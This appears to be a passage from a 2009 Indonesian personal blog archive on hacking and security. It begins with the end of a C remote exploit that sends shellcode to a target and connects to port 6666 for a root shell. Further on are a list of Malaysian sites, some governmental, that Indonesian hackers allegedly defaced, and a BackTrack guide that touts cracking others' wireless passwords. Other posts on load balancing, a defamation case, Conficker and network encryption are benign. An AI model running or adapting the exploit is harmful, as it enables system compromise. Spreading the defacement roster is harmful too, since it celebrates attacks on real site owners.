memset(ptr,’B',limit * 10000 – 8 – strlen(shellcode));
}
else{
memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
ptr += strlen(fbsd_shellcode);
memset(ptr,’B',limit * 10000 – 8 – strlen(fbsd_shellcode));
}
send(sock,buffer,strlen(buffer),0);
send(sock,ptr,3750,0);
close(sock);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
printf(” [-] connecting failed\n”);
}

payload[sizeof(payload)-1] = ‘\0′;
payload[sizeof(payload)-2] = ‘\0′;
send(sock,buffer,strlen(buffer),0);
send(sock,payload,strlen(payload),0);
close(sock);
free(payload);
addr.sin_port = htons(6666);
if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
/* v— our cool bar that says: “r0000000t!!!” */
printf(”\n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]\n\n”);
fremote(”PS1=’sh-3.2#’ /bin/sh”);
}
else
printf(” [-] failed to exploit target : (\n”);
close(sock);
return 0;
}

=====================================


mungkin sepertinya komunitas ini emang bener mengincar rumah str0ke dan rumah si jesse .
idih main ddos lagi, bener" dendam kayaknya .
heuheuheu :P
tapi au ah gelap .
vina boro" ngerti sama yang kaya ginian .
lagian anti-sec ini emang bener-bener master.
liat aja logatnya. mereka ga fikir klo diatas langit masih ada langit .
hufftt .. tape deh
heuheuheuheu :P




Regard


ELV1N4




Labels:


On 7/12/09 at 6:08 AM


IDSecconf 2009 Call For Paper

MARI KITA KIRIMKAN PAPER MENGENAI SECURITY TENTANG

- Web hacking
- Wireless hacking
- Metode Penetration testing
- Forensic dan Anti Forensic
- Kriptografi
- Fuzzing
- Exploit writing
- System hardening
- Lock Picking
- Open Hardware Implementation


yu baca-baca dan saling berbagi pengetahuan tentang explotasi dirimu dari sekarang .

untuk lebih lengkapnya bisa di klik di http://2009.idsecconf.org


Regard


Elv1n4

Labels:


On 7/8/09 at 10:53 AM


Di tuduh Fitnah Via Email, 6 Tahun dan denda 1 miliar menanti

Malang sekali nasib ibu Prita Mulyasari yang mendekam di sell tahanan Wanita pada Rabu 13 Juni Lalu yang di tuding MENCEMARKAN NAMA BAIK RUMAH SAKIT OMNI TANGGERANG.
surat itu berisikan keluhan Ibu Prita yang memperoleh hasil lab yang diduga fiktif atau bohong, sehingga ibu Prita terpaksa menginap di RS tersebut. dengan kata lain berunsur penipuan.
wadowww katanya negara demokratis yang unsurnya bebas mengeluarkan suara dan pendapat.
tapi kok jadi di cekal begini.

unek unek vina kembali penasaran karena ingin mengetahui lebih dalam lagi, maklum anak hukum harus berani membela kebenaran <--- huehuehuehue :P kayak Pahlawan bertopeng aja . ehmm ehmm kata pihak RS OMNI sih ibu Prita sendiri telah melanggar pasal UUITE, jadi inget musuh besar vina si SOTAU ALIAS SI ROY SURYO
gini isinya

Pasal 28

(1) Setiap Orang dengan sengaja dan tanpa hak menyebarkan berita bohong dan menyesatkan yang mengakibatkan kerugian konsumen dalam Transaksi Elektronik.

(2) Setiap Orang dengan sengaja dan tanpa hak menyebarkan informasi yang ditujukan untuk menimbulkan rasa kebencian atau permusuhan individu dan/atau kelompok masyarakat tertentu berdasarkan atas suku, agama, ras, dan antargolongan (SARA).

Pasal 35

Setiap Orang dengan sengaja dan tanpa hak atau melawan hukum melakukan manipulasi, penciptaan, perubahan, penghilangan, pengrusakan Informasi Elektronik dan/atau Dokumen Elektronik dengan tujuan agar Informasi Elektronik dan/atau Dokumen Elektronik tersebut dianggap seolah-olah data yang otentik.

Pasal 36

Setiap Orang dengan sengaja dan tanpa hak atau melawan hukum melakukan perbuatan sebagaimana dimaksud dalam Pasal 27 sampai dengan Pasal 34 yang mengakibatkan kerugian bagi Orang lain.


wow bila dilanggar akan menghadapi ancaman pidana seperti yang diatur pada Pasal 51 UU ITE:

Pasal 51

(1) Setiap Orang yang memenuhi unsur sebagaimana dimaksud dalam Pasal 35 dipidana dengan pidana penjara paling lama 12 (dua belas) tahun dan/atau denda paling banyak Rp 12.000.000.000,00 (dua belas miliar rupiah).
(2) Setiap Orang yang memenuhi unsur sebagaimana dimaksud dalam Pasal 36 dipidana dengan pidana penjara paling lama 12 (dua belas) tahun dan/atau denda paling banyak Rp 12.000.000.000,00 (dua belas miliar rupiah).



namun pada tanggal 3 Juni 2009 Ibu Prita Mulyasari Di bebaskan Dari tahanan Seperti yang di kutip di berita
http://www.detiknews.com/read/2009/06/03/160717/1142159/10/prita-mulyasari-bebas-dari-penjara

Untuk Ibu Mulyasari Vina Ucapkan Selamat Dan Janganlah Berhenti Untuk berkarir di Dunia Maya Ini .

Labels:


On 6/3/09 at 3:36 AM


Introduction to Load Balancing with HAPROXY

Load balancing (LB) adalah salah satu technology yang udah cukup lama, namun tidak cukup familiar di kalangan IT itu sendiri,padahal hampir sebagian besar site-site yang memiliki traffic tingkat tinggi pasti menggunakan teknologi LB untuk membagi beban ke server atau cluster yang mereka miliki. berikut ini adalah contohnya:
%host -t a www.detik.com
www.detik.com is an alias for detik.com.
detik.com has address 202.158.66.94
detik.com has address 203.190.241.41
detik.com has address 203.190.241.43
detik.com has address 202.158.66.190
detik.com has address 202.158.66.86
detik.com has address 203.190.241.166
detik.com has address 202.158.66.20

%host -t a www.google.co.id
www.google.co.id is an alias for www.google.com.
www.google.com is an alias for www.l.google.com.
www.l.google.com has address 66.249.89.104
www.l.google.com has address 66.249.89.147
www.l.google.com has address 66.249.89.99


Okey, 2 contoh diatas cukup memberi gambaran bahwa kedua site tersebut menggunakan teknologi balancing. Untuk definisi LB itu sendiri bisa dibaca disini. LB memiliki beberapa algoritma atau metode dalam membagi beban ke server atau cluster yang mereka miliki:

1. DNS Load Balancing
Metode ini menggunkan sebuah domain name yang menunjuk ke-beberapa IP publik sekaligus, silahkan baca disini untuk keterangan lebih lanjut

2. Random Allocation
Ini adalah algoritma random, tidak ada yang perlu dijelaskan lebih lanjut, karena algoritma ini membagi beban ke server secara random tanpa ada sebuah pola yang jelas.

3. Round Robin
Round robin membagi incoming request secara rotasi, jadi misalkan ada 3 server yang menjadi anggota dari sebuah cluster, ketika ada request pertama, maka server A yang akan menghadle-nya, request kedua Server B, request ketiga server C. Kemudian ketika ada request ke-4 maka itu akan dirotasi lagi ke server A kemudian request ke-lima akan diberikan ke server B, begitu seterusnya. selengkapnya bisa anda baca disini

4. Weighted Round-Robin Allocation
Algoritma ini adalah pengembangan dari algoritma round robin, sedikit perbedaannya adalah algoritma ini bisa membagi beban lebih tinggi ke server atau cluster yang memiliki resource yang lebih besar

Ada banyak aplikasi maupun hardware yang bisa menjalankan teknologi LB. Cisco, F5, Barracuda, dan Juniper adalah beberapa vendor yang menyediakan dedicated hardware untuk service LB. Sementara itu untuk software, anda bisa melihatnya disini
Diantara beberapa aplikasi LB, salah satu yang cukup menarik bagi saya adalah haproxy, karena selain ringan, juga cukup mudah dalam penggunaannya. Mari kita coba menjalankan haproxy dengan kasus sederhana. Saya menggunakan system OpenBSD sebagai mesin load balancer.

Saya mem-build haproxy dari ports:
# uname -a
OpenBSD k-elektronik 4.4 GENERIC#0 i386
# cd /usr/ports/net/haproxy/
# cat distinfo
MD5 (haproxy-1.3.15.2.tar.gz) = pk1/WnRk52n4Z2gCvo6PNg==
RMD160 (haproxy-1.3.15.2.tar.gz) = YHMIoB0/Y/d6x65m00Krml6Ikn8=
SHA1 (haproxy-1.3.15.2.tar.gz) = LRPN8fhog+eFcffPI4qb+MAupC8=
SHA256 (haproxy-1.3.15.2.tar.gz) = YgK8PuWbtVe+WsgMfKQrOUnaBL0plx4395HSdxwOQmQ=
SIZE (haproxy-1.3.15.2.tar.gz) = 501219
# make install clean
# /usr/local/sbin/haproxy -v
HA-Proxy version 1.3.15.2 2008/06/21
Copyright 2000-2008 Willy Tarreau


untuk konfigurasi dengan 2 server farm, minimal file config haproxy terlihat seperti berikut:
# cat haproxy.conf
global
log 127.0.0.1 local0
log 127.0.0.1 local1 notice
maxconn 1024
ulimit-n 65536
daemon
nbproc 8 # Number of processing cores

defaults
mode http
log global
option httplog
option dontlognull
clitimeout 180000
srvtimeout 180000
contimeout 100000
retries 15
option redispatch
option httpclose
option abortonclose
option httpchk

listen http_main 11.11.11.11:80 # bukan IP sebenarnya :D
option httpclose
option forwardfor
cookie apaaja insert indirect nocache
option httpchk /http_check.html
balance roundrobin # Load Balancing algorithm

server server01 192.168.1.1:80 check inter 2000 rise 2 fall 5
server server02 192.168.1.2:80 check inter 2000 rise 2 fall 5


sebelum menjalankan haproxy, pastikan bahwa kedua webserver anda telah jalan dengan baik
#/usr/local/sbin/haproxy -f /usr/local/etc/haproxy.conf
# ps xw | grep haproxy | head -n 1
845 ?? Ss 0:52.58 /usr/local/sbin/haproxy -p /var/run/haproxy.pid -f /usr/local/etc/haproxy.conf


banyak sekali hal menarik yang anda bisa lakukan dengan haproxy, silahkan baca disini, dan juga ini untuk pendalaman lebih lanjut. For security..?!hhmm, i will post it again later.


author : jackD
resensi : http://www.kecoak-elektronik.net/log/2009/01/23/introduction-to-load-balancing-with-haproxy/

Labels:


On 5/6/09 at 9:19 AM


Hacker Malaysia Berunding Untuk Damai Dengan Hacker Indonesia

tadi pagi aku chat dengan salah satu temanku di dunia underground crussd2

setelah bercakap" dengannya tiba-tiba dia beri link site yang katanya berisi tentang pernyataan hacker malaysia yang akan berdamai dengan hacker indonesia.

tapi tiba - tiba hati vina dag dug deg ga karuan
pouffftt......

OH MY GOD takut sekali T_T
dikasih link sama anak underground membuat hati vina jadi bingung.
di benak vina berfikir "buka atau ngga, buka atau ngga" .
poufftt ,ya sudah vina memberanikan diri untuk membuka situs itu
lalu alhasil benar loh
hasil dari forum HMSECURITY yang konon itu forum hackernya malaysia.
hmmmm..
bener juga tuh kata kk Crussd2
heuheuheuheu
maaf yah kk cruss , vina udah berfikir yang macam" xP

berikut linknya

http://www.hmsecurity.org/v3/beta/loading.../forum/viewthread.php?forum_id=16&thread_id=1330&pid=15007


hmmm setahu vina sih indonesia sudah melakukan cybernaticwar dengan malaysia untuk ke 2 kalinya.
untuk hasil yang vina ketahui indonesia menang telak dari malaysia :)
berikut situs" yang pernah di retas oleh hacker indonesia :


http://inter.com.my/
http://anuarbiz.motivasi.net.my/
http://ebuku.motivasi.net.my/
http://zazaopicalhouse.motivasi.net.my/
http://musicrecords.motivasi.net.my/
http://www.asosb.com.my/sekolah/perpustakaan/view.html
http://kanzzs.motivasi.net.my/
http://ksrid.eceylinco.com.my/
http://hidroboost.motivasi.net.my/
http://www.johordt.gov.my/pnj/administrator/
http://www.vibrant.com.my/news.php
http://www.gtb.com.sa/images/url.htm
http://elysianphotography.com/
http://ramezouss.ra.funpic.de
http://www.lakelandptv.org/templates/elvina.php
http://video.exnet.gr/templates/index.php
http://www.magictradingcanada.com/admin
http://quickwebscripts.com/templates/
http://www.giant.com.my/news.php
http://novinparsian.ir/download/elvina.php
http://techpoint2u.net/templates/md_glossypaint/index.php
http://www.pemudapahang.net/administrator/components/
http://fst.upsi.edu.my/images/
http://www.malaysiansia.com/
http://www.campuslife.com.my/index.php/articles-a-student-advice/clueless-about-studying/48-clueless-about-studying/24-contact-us
http://techpoint2u.net/index.php/about.html
http://www.purnama2u.com/v5/index.php/agama-dan-keluarga/tazkirah/58-tazkirah/1593-penghayatan-ibadah-korban-dalam-perjuangan-pas
http://cms.motionworks.com.my/
http://www.wealthlink.com.my/index.php?option=content&task=view&id=181&Itemid=27
http://jmsb.com.my/products/productlist.aspx?Page=5&bid=&mid=&searchmode=2¶mresult=MPV
http://pnpftmk.upsi.edu.my/~poac/xampp/htdocs/xampp/joomla/index.php?option=com_content&view=article&id=90%3A497-orang-asli-mampu-dapat-lesen-memandu&catid=1%3Alatest-news&Itemid=139
http://staff.iiu.edu.my/bsukry/?p=32
http://www.lodgeschool.edu.my/index.php
http://www.tegastepat.com.my/
http://ppddungun.edu.my/
http://malay.cari.com.my/archiver/?tid-274364.html
http://www.bookshop.com.my/modules/whatnews/news.php
http://www.timelessdesign.com.my/shop/modules/whatnews/news.php
http://www.emalaysia.com.my/
http://www.mycountydeals.com/cgi
http://www.mycountydeals.com/components
http://www.mycountydeals.com/components/com_artforms/assets/captcha/
http://crazzyspace.com/system/cache/
http://www.a1e.es/templates/beez/index.php
http://bumiventures.com/
http://special0.time.net.my/time4u/music/article.cfm?ID=174
http://21stcentury.com.my
http://cms.lclgroup.com.my
http://corpex.com.my
http://www.kbse.com.my/en/
http://www.hkl.gov.my/content/jiah.php
http://helanghotellangkawi.com
http://www.ktdi.com.my/
http://jennydboutique.com.my
http://klonline.com.my
http://inter.com.my
http://geomatika.edu.my
http://www.inhad.org.my/Institutedetail.aspx?ID=9
http://graduanbersatu.com.my
http://e-host.com.my
http://dtcbizcentre.com.my
http://demo.shops.com.my
http://langkawigeopark.com.my
http://pronutrition.com.my
http://puspatri.edu.my
http://free.my
http://carepro.com.my
http://salesdo.com.my
http://seri-abim.edu.my
http://adsrealestate.net.my
http://alfioraldo.my
http://kgsripayakulai.com/joomla/
http://kadkahwinworld.com/ver1/
http://tukulesto.tanjaktech.com.my/hell.php
http://www.sinsualdaydreams.com/newcontact.html
http://tukulesto.gtfsabah.com/
http://www.jkhairat.com.my/Default.php
http://www.krafmalaysia.com.my/
http://tls.damansaraassets.com.my/Default.php
http://ansar.damansaraassets.com.my/Default.php
http://emagazines.com.my/index.php
http://www.bnm.gov.my
http://www.juzi.org.my/
http://specialcashsweep.com.my
http://www.autem.org.my
http://www.kidzmag.com.my
http://www.pdtjasin.gov.my
http://portal.pahangtourism.org.my/
http://wianex.net/cms/administrator/index.php
http://www.alpine.com.my/category01.asp?currentPage=2
http://gov-malaysia.bchomeschool.net/CREDITS.php
http://malaysia.stansmixertrucks.com/blast_demo.html
http://malaysia.austrocan.com/
http://btpnlabuan.moe.edu.my/skbukitkalam/
http://btpnlabuan.moe.edu.my/skbebuloh/
http://btpnlabuan.moe.edu.my/skrancharancha/
http://asiawebserver.net/malaysiaontoday/
http://asiawebserver.net/missalifah/
http://kelantanredwarriors.com/
hfckp://btpnlabuan.moe.edu.my/
http://leluhur-bugis.4u.net.my/news/
http://pnpftmk.upsi.edu.my/~poac/xampp/htdocs/xampp/joomla/index.php?view=article&catid=1:latest-news&id=90:497-orang-asli-mampu-dapat-lesen-memandu&tmpl=component&print=1&page=
http://www.microair.com.my/
http://www2.ikm.edu.my/kl/index.php?option=com_docman&task=cat_view&Itemid=65&gid=63
http://www.epu.jpm.my/mdi1/Default.asp
http://www.fish.net.my/details.php?id=124
http://staff.iiu.edu.my/bsukry/?p=32
http://www.msti.com.my/
http://www.nrtechnologies.com.my/
http://www.alpine.com.my/news.asp
http://www.13am.com.my/products.php?c=22&p=30
http://www.itools.com.my/home/
http://www.i-putra.com.my/news_events.cfm?id=191
http://www.kmb.edu.my/



huftt untung aja vina bukan hacker
:)
jadi ga perlu pusing untung mikirin yang kaya gitu :)

Labels:


On 5/3/09 at 8:38 PM


BACKTRACK 4 BETA SUDAH DI RILIS

kemarin udah nyoba backtrack 3 final, tapi pas mau install langung ga bisa 2
hufftt, kepaksa install ulang distro backtracknya 1
oke nih sedikit masukan cara untuk install backtrack 3 final
-buat partisi untuk backtrack dengan filesystem ReiserFS ( jika anda akan membuat 1 os di pc anda )
-buat partisi pertama untuk root dengan size min 5 Gb (recommendasikan dengan kapasitas hd anda )
-buat partisi kedua untuk swap dengan size 2 kali dari jumlah RAM komputer (ex: ram 1 GB = Swap 2GB)
-lakukan Booting menggunakan Live CD Backtrack 3 Final
-klo udah masuk ke dalam sistem, gunakan terminal dalam Backtrack untuk melakukan format partisi
#mkreiserfs /dev/sda3
#umount /dev/sda3

-buatlah folder untuk umount partisi baru tersebut dengan cara :
#cd /
#mkdir /mnt/backtrack
#mount /dev/sda3 /mnt/backtrack

-Download Slack Installernya
–13:00:22– http://backtrack.serveftp.com/backtrack … stall.kmdr
=> `slax6-install.kmdr’
Resolving backtrack.serveftp.com… 137.132.19.24
Connecting to backtrack.serveftp.com|137.132.19.24|:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 12,607 (12K) [text/plain]

8% [===================> ] 1,068 –.–K/s ETA 01:32
100%[===========================================>] 12,607 1.98K/s ETA 00:00

13:04:10 (747.24 B/s) - `slax6-install.kmdr’ saved [12607/12607]


-klik slack installer
# /usr/bin/kmdr-executor slax6-install.kmdr

-jika anda mempunya 2 os, setting lilo.conf agar bisa booting OS lainnya.
#cd /
#nano /etc/lilo.conf
boot = /dev/sda
prompt
timeout = 1200
change-rules
reset
vga = 773
image = /boot/vmlinuz
root = current
label = BackTrack
read-only
# Tambahkan OS Windows
other = /dev/sda1
label = Windows
table = /dev/sda

-jalankan lilonya 1
#lilo -v

-restart pc/nb km
-selamat menikmati fasilitas backtrack 3 1 seperti hack wireless 10 jadi ngenet gratis,merubah password ap orang lain 10, tahan serangan dos (denial of service) 1 .

nah sekarang lanjutnya wah wah udah ada backtrack ver 4 beta dengan kekuatan baru. Ya meskipun masih beta, tapi soal kekuatannya lebih baik dari backtrack 3 tentunya 10 (sotau yah vina 10 )
Yang beda dari backtrack 4 adalah, tidak lagi menjadi turunan dari slackware, sebagai gantinya backtrack 4 ini menginduk kepada Distro Linux Debian, dengan mengakar kepada utilitas repositori milik Ubuntu. tapi aneh nya backtrack 4 memiliki jam tayang lebih panjang karena hadirnya sistem sinkronisasi dengan repositori backtrack online. dengan artian klo misalkan ada tools security yang jalan akan automatis melakukan update 4
inilah feature"nya
* Kernel 2.6.28.1 with better hardware support
* Support for PXE Boot
* SAINT EXPLOIT
* MALTEGO
* Unicornscan - Fully functional with postgress logging support and a web front end.
* RFID support
* Pyrit CUDA support
* The latest mac80211 wireless injection pacthes are applied, with several custom patches for rtl8187
injection speed enhancements. Wireless injection support has never been so broad and functional.
* New and updated tools


klo mau download aja
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
854 MB, DVD Image

Labels:


at 8:17 PM


AYO TANGKAP MEREKA !!!!

Tangkap Pembuat Virus Confiker dapat 3 Milyar
Perusahaan Software raksasa Microsoft menawarkan hadiah sebesar $250,000 atau sekitar Rp 3 Milyar untuk informasi tentang keberadaan pembuat virus komputer Conficker atau di Indonesia sering disebut virus Recycler.. Dengan informasi ini,Microsoft akan melakukan penangkapan dan penghukuman pada kelompok pembuat virus yang telah menginfeksi jutaan komputer tersebut.

Para ahli mengatakan satu laptop dapat menyebarkan virus ini ke seluruh jaringan komputer.Sejauh ini, mereka dibingungkan tentang apa sebenarnya tujuan utama virus Conficker ini. Virus ini telah membuktikan bahwa penyebarannya sebagai salah satu penyebaran terbesar yang pernah terjadi.

Virus ini memanfaatkan sebuah bug di Microsoft Windows untuk menginfeksi sebagian besar jaringan perusahaan, walaupun virus ini belum menyebabkan kerusakan apapun tapi dia memiliki hubungan dengan titik asal pembuatnya, ini artinya dia dapat menerima perintah langsung dari pembuatnya untuk membuat kerusakan.

Microsoft telah membagikan patch untuk memperbaiki bug ini, tetapi jika satu PC terinfeksi di sebuah jaringan besar, virus ini dapat menyebar tanpa terkendali sehingga sering menginfeksi ulang PC yang sudah diperbaiki, sehingga patch yang sudah dilakukan menjadi percuma.Ancaman virus ini mendesak Microsoft yang bekerjasama dengan industri teknologi lainnya untuk mengumumkan hadiah sebesar $250,000 untuk informasi tentang keberadaan pembuat virus Conficker ini.“Sebagai bagian dari usaha keamanan berkelanjutan Microsoft, kami tak henti-hentinya mencari berbagai macam cara dan pengembangan metodologi untuk melindungi pelanggan kami” kata George Stathakopoulos, dari Microsoft's Trustworthy Computing Group.

Mikko Hypponen, pemimpin penelitian di anti-virus F-Secure mengatakan banyaknya penyebaran virus sebenarnya tidak diketahui, tapi dalam 24 jam terakhir perusahaannya memonitor sinyal Conficker dari dua juta alamat protokol Internet.“Itu sangat banyak” dia bercerita pada CNN. “Dan satu alamat IP disini tidak berarti satu komputer yang terinfeksi, itu sebenarnya berarti setidaknya satu komputer terinfeksi.”

“Sebagian besar alamat-alamat IP adalah proxy atau firewall perusahan, yang dibelakangnya terdapat lebih banyak PC yang terinfeksi. Jadi, ini membuat tidak mungkin untuk memperkirakan total banyaknya sistem yang terinfeksi. Jadi penyebarannya itu sangat besar” Microsoft sebelumnya sudah pernah membayar hadiah yang sama untuk seseorang yang menginformasikan keberadaan pembuat virus Sasser, salah satu virus terkenal pada tahun 2004. Pelaku sudah dibawa ke Jerman, dimana dia dijatuhi hukuman satu tahun kemudian.

Jadi, walaupun hampir tidak mungkin pembuat virus Conficker ini berada di Indonesia, jika Anda tahu tentang keberadaan pembuat virus ini segeralah melapor ke Microsoft, Anda akan langsung menjadi milyuner karena mendapatkan hadiah Rp 3 Milyar. Untuk pembuat virus lokal, segeralah bertobat karena tidak menutup kemungkinan Anda juga bisa dipenjarakan akibat terus membuat virus dan menyebarkannya di Indonesia.

Labels:


On 3/13/09 at 6:46 AM


Meningkatkan Sekuriti Jaringan Komputer Anda

Secara umum, masalah sekuriti di Internet dapat dipandang dari dua sisi penting. Sisi pertama adalah integritas data yang dikirimkan melalui jaringan Internet (sebut saja integritas pengiriman data) dan sisi berikutnya adalah tingkat sekuriti dalam jaringan komputer itu sendiri (kita sebut sekuriti jaringan internal).

Integritas Pengiriman Data

Pada saat kita mengirimkan data melalui jaringan Internet, kita selalu ingin agar data yang kita kirimkan tersebut sampai di tujuan dengan selamat dan tidak mengalami campur tangan pihak lain. Syarat ini menjadi jauh lebih utama apabila data yang kita kirimkan tergolong kategori data rahasia.

Pada saat kita kirimkan, data tersebut akan melalui berbagai jenis komputer, router, atau gateway dan melintasi berbagai macam media fisik komunikasi. Kita mempertaruhkan integritas data kepada keanekaragaman di atas. Tentunya kita tidak mungkin memeriksa tingkat sekuriti di setiap hop/titik yang dilalui oleh data tersebut karena tingkat sebaran dan kepemilikan hop yang sangat beraneka ragam. Salah satu solusi yang dapat diterapkan adalah enkripsi data. Tujuan utama dari solusi ini adalah mencegah terjadinya curi-dengar (eavesdropping) terhadap data yang kita kirimkan maupun yang kita terima. Jika seorang "eavesdropper" melakukan tindakan curi-dengar, ia akan memperoleh data-data yang terenkripsi saja sehingga tidak mencerminkan isi data sebenarnya.

Proses enkripsi data bisa diterapkan di lapisan (layer) tertentu dari protokol TCP/IP. Seperti telah diketahui, protokol TCP/IP memiliki 4 lapisan guna menunjang proses komunikasi data. Lapisan tersebut terdiri dari Application Layer, Transport Layer, Internet Layer, Network Access Layer. Kita bisa menerapkan proses enkripsi di masing-masing lapisan. Masing-masing implementasi dari lapisan-lapisan tersebut sebagai berikut :

Network Access Layer

Bentuk nyata dari lapisan ini adalah bagian hardware dari sebuah komputer. Bila akan menerapkan proses enkripsi di lapisan ini, kita harus mencari atau menciptakan hardware khusus yang menangani masalah enkripsi data. Beberapa lembaga penelitian telah mulai menggali lebih dalam kemungkinan penciptaan hardware yang memiliki kemampuan enkripsi data yang lebih baik.

Internet Layer

Dalam protokol TCP/IP, Internet layer diimplementasikan dalam Internet Protocol (IP). Protokol ini berbentuk software yang mengatur tentang pengalamatan dan proses routing. Protokol ini telah diberikan nilai tambah tersendiri untuk meningkatkan sekuriti data yang dikirimkannya. Nilai tambah tersebut masing-masing adalah Authentication Header dan Encapsulating Security Payload.

Authentication Header (AH) adalah sebuah header tambahan yang bertujuan memberikan jaminan atas syarat integritas data yang dikirimkan dan syarat keaslian sumber pengirim beserta data yang dikirimkan (authentication). Header ini berada di posisi paling akhir dari header-header pada lapisan IP dan sebelum header Encapsulating Security Payload (ESP). AH juga bisa menjamin non-repudiation dari sebuah data apabila penerapan AH menggunakan algoritma kriptografi tertentu. Non-repudiation adalah syarat di mana pihak penerima bisa membuktikan bahwa pihak pengirim benar-benar mengirimkan data yang diterima pihak penerima meskipun pihak pengirim tidak mengakuinya. Informasi yang terkandung di dalam AH ini dihasilkan dari perhitungan seluruh bagian dari datagram IP (mulai dari header IP, header protokol di atas IP, hingga data aslinya). Bila pihak penerima menerima datagram yang tidak otentik berdasarkan penilaian AH, datagram tersebut akan diabaikan. Mekanisme ini bisa digunakan untuk mencegah aksi-aksi IP spoofing. Aksi ini bertujuan agar penyusup bisa berpura-pura sebagai pihak pengirim dengan cara menebak datagram yang akan dikirimkan.

Encapsulating Security Payload (ESP) adalah sebuah mekanisme tambahan pada datagram IP yang bertujuan untuk meningkatkan confidentiality dan integritas data. Confidentiality adalah suatu syarat di mana penerima mengetahui arti yang sebenarnya dari data yang dikirimkan sedangkan pihak lain yang tidak diharapkan tidak akan mengerti arti yang sebenarnya dari data yang dikirimkan. Hasil implementasi ESP adalah sebuah datagram IP yang bagian datanya telah terenkripsi. ESP diletakkan di posisi paling akhir dari serangkaian IP header dan sebelum bagian pertama data. ESP memiliki header tersendiri yang disebut ESP Header. Untuk modus paling aman, format ESP Header adalah awal dari header tersebut tidak dienkripsi sedangkan sisa header dan seluruh bagian data dienkripsi.

|<---- Tidak dienkripsi ---->|<----- Dienkripsi ------>| +------------+-------------------+------------+-----------------------+ | IP Header | IP Header lainnya | ESP Header | data yang dienkripsi | +------------+-------------------+------------+-----------------------+

Bagian header yang tidak dienkripsi memberikan keterangan tentang cara mendekripsi dan memproses data yang dienkripsi tersebut. ESP dapat diterapkan pada setiap jenis transport layer (TCP, UDP) yang digunakan. Mekanisme ini lebih banyak diterapkan untuk modus Tunnel. Tunnel adalah sebuah modus pada pengiriman data yang lebih bersifat privat dan khusus melalui jaringan Internet. Intranet, terutama yang digunakan untuk menghubungkan cabang-cabang yang tersebar di berbagai daerah, adalah salah satu pengguna modus Tunnel.

Transport Layer

Dalam konsep TCP/IP, secara umum transport layer dibagi menjadi dua, yaitu Transmission Control Protocol (TCP) dan User Datagram Protocol (UDP). Pada lapisan ini, belum begitu banyak mekanisme yang dikembangkan untuk menambahkan aspek sekuriti. TCP sendiri sudah memiliki rutin-rutin yang cukup kompleks dalam mengolah data yang diterima.

Application Layer

Lapisan ini adalah lapisan yang langsung berhubungan dengan user. Apa yang dilihat oleh user pada layar monitor komputer adalah tampilan dari Application Layer tersebut.

Teknik-teknik yang digunakan untuk mengenkripsi data pada lapisan aplikasi ini telah banyak berkembang dan mencapai hasil yang cukup memuaskan. Berbagai macam jenis algoritma enkripsi telah dikembangkan dan beberapa di antaranya telah menjadi standar internasional. Beberapa algoritma yang cukup terkenal adalah Data Encryption Standard (DES), Triple-DES, RC2/RC4, International Data Encryption Algorithm (IDEA) dan Skipjack. Algoritma DES dan IDEA telah banyak diterapkan di dunia sedangkan algoritma lainnya telah dipatenkan. Dari algoritma-algoritma di atas, dibuatlah berbagai macam software pengenkripsi. Salah satu yang terkenal dan bersifat shareware adalah Pretty Good Privacy (PGP).

Penerapan software enkripsi pada Application layer bisa bermacam-macam. Salah satunya, kita bisa mengenkripsi isi dari eletronic mail. Selain itu, kita juga bisa mengenkripsi file-file yang akan kita berikan kepada orang lain melalui FTP. Pesan-pesan elektronik pun dapat kita enkripsi terlebih dahulu sebelum kita kirimkan. Setelah sampai di tujuan, penerima dapat mendekripsi pada layer yang sama apa yang ia terima sehingga mencerminkan arti sebenarnya.

Khusus dalam HyperText Transfer Protocol (HTTP), telah dikembangkan berbagai macam mekanisme pengamanan data yang ditransfer melalui protokol ini. Protokol HTTP menjadi tulang punggung dalam World Wide Web (WWW) dan kita lebih sering melihatnya dalam bentuk home page di situs-situs Internet. Beberapa perusahaan di dunia telah memanfaatkan WWW sebagai salah satu saran penghubung kepada konsumen dan pelanggan mereka. Bahkan WWW telah pula digunakan sebagai penghubung antar bagian perusahaan mereka sendiri dalam teknologi Intranet. Untuk menjamin integritas data yang dikirimkan, para pakar kriptografi telah mengembangkan beberapa mekanisme enkripsi untuk protokol tersebut. Dua dari berbagai mekanisme yang ada di Internet adalah SecureHTTP (SHTTP) dan Secure Socket Layer (SSL). SSL dikembangkan oleh Netscape dan telah diimplementasikan di beberapa situs di Internet. Dengan adanya mekanisme-mekanisme ini, pengiriman nomor rekening, kata kunci rahasia, dan data-data rahasia lainnya bisa dilakukan di Internet dengan lebih aman.

Sekuriti Jaringan Internal

Sisi selanjutnya adalah keamanan dari jaringan komputer internal. Pada saat kita memutuskan untuk membangun sebuah jaringan komputer yang terhubung ke Internet, saat itu pula kita telah mengambil resiko untuk berhadapan dengan ancaman-ancaman penyusupan dan pengrusakan data dari Internet. Oleh karena itu, kita harus mempersiapkan jaringan komputer kita untuk menghadapi serangan-serangan dan ancaman-ancaman tersebut.

Masalah sekuriti jaringan internal ini meliputi beberapa aspek. Untuk mudahnya, masalah tersebut dapat dipecah menjadi dua bagian yaitu bagian software-hardware dan bagian user.

Bagian software-hardware

Dalam membangun sebuah jaringan komputer, kita memiliki kebebasan dalam merancang, baik dari struktur jaringan maupun konfigurasi hardware dan jenis program yang akan digunakan. Struktur jaringan yang akan direalisasikan dapat dirancang sedemikian rupa sehingga memiliki tingkat sekuriti yang tinggi. Sebagai contoh, kita bisa membuat sebuah jaringan perimeter atau lebih dikenal dengan sebutan DeMilitary Zone (DMZ) yang memberikan layanan dan akses seperlunya saja kepada Internet. Jaringan perimeter merupakan jaringan yang langsung berhadapan dengan Internet setelah melalui sebuah router atau gateway. Dari segi hardware, kita dapat menentukan spesifikasi hardware yang tepat sesuai kebutuhan dan tugas yang akan diberikan kepada hardware tersebut. Sebagai contoh, untuk menjadi sebuah mail server yang menangani 100 buah mailing list atau lebih, tentunya kebutuhan akan jumlah memori/RAM dan swap memory yang disediakan menjadi melonjak. Selain itu, bila terdapat usaha-usaha pengrusakan pada mail server tersebut dengan berbagai cara seperti mail bombing, setidak-tidaknya mail server kita masih bisa bertahan.

